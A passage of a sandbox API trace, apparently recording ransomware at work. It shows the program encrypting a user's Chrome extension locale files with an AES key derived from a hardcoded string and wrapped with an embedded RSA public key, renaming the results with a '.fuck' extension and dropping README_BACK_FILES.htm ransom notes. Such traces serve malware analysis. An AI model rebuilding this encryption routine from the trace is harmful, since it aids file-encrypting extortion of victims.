lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.837] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.837] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.837] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.837] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.837] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.837] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.838] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.838] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.838] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.838] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x305, lpOverlapped=0x0) returned 1 [0262.838] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x305, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x310) returned 1 [0262.838] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x310, lpOverlapped=0x0) returned 1 [0262.838] CloseHandle (hObject=0x5d5c) returned 1 [0262.838] CloseHandle (hObject=0x5d60) returned 1 [0262.838] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0262.841] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0262.842] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg")) returned 1 [0262.843] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.fuck")) returned 1 [0262.844] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0262.844] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0262.844] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.844] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.844] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0262.844] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0262.844] AreFileApisANSI () returned 1 [0262.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.844] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.845] GetFileType (hFile=0x5d64) returned 0x1 [0262.845] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.846] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.846] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.846] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.846] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.846] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.846] GetLastError () returned 0x0 [0262.846] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json")) returned 0x20 [0262.847] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json", dwFileAttributes=0x80) returned 1 [0262.847] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.847] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.849] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.849] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.851] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.851] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.851] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.851] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.851] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.851] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.851] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74670) returned 1 [0262.851] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74670, dwCertEncodingType=0x1, pInfo=0x2eae390*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae3c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae3c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e880) returned 1 [0262.851] CryptEncrypt (in: hKey=0x2e7e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.851] CryptEncrypt (in: hKey=0x2e7e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e745e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e745e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.852] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e745e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e745e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.853] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.855] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.855] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.863] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.864] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.864] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.864] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.864] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.864] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.865] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.865] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.865] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.865] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.865] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.866] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.866] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.866] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.866] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.866] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.867] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 